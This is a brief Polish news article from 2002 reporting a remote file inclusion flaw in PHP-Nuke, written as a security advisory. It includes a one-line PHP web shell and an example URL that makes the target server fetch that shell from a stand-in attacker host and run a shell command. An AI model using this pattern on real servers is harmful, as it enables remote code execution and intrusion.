Jak donosi serwis Securityfocus odkryta została luka w PHP-Nuke, umożliwiająca wykonywanie komend systemowych oraz uruchamianie jakiegokolwiek kodu PHP.
Luka wykorzystuje dyrektywę odnoszącą się do plików (index.php?file=file) w celu podsunięcia skryptowi adresu url (http://...) do strony, na której znajduje się wcześniej przygotowany kod PHP, który zostanje pobrany i wykonany przez atakowany serwer.
Jako przykład wykorzystany został skrypt PHP wykonujący dowolne polecenie shella (należy go umieścić na wcześniej przygotowanym koncie www):
<?php system($cmd); ?>
Aby wykonać na atakowanym serwerze polecenie "ls -al" z wykorzystaniem powyższego skryptu należy podać adres w następującej formie:
http://atakowany.serwis/index.php?
file=http://adres.przygotowanego.skryptu.php/skrypt.php&cmd=ls%20-al
Inne eksploity można tworzyć postępując analogicznie.
Tekst źródłowy i więcej informacji znajduje się pod adresem:
www.securityfocus.com/archive/1/250777
Poważna luka w PHP-Nuke!
Zabezpieczenia |
Czw, 17 Sty 2002 20:08:45 +0100 |
Autor:
Redakcja
| Czytań: 2257
Top 20 news
Komentarze
Najaktywniejsi
1
Rellik 9520 pkt.
2
grzemach 850 pkt.
3
betaKondor 470 pkt.
4
Koras 350 pkt.
5
Localghost 120 pkt.
6
elmocamp 100 pkt.
7
Tommy 100 pkt.
8
Scoti 80 pkt.
9
sevar 60 pkt.
10
Maximus 50 pkt.
W tej chwili nie ma jeszcze komentarzy. Możesz jednak dodać swój własny.
Aby dodawać komentarze musisz się zalogować.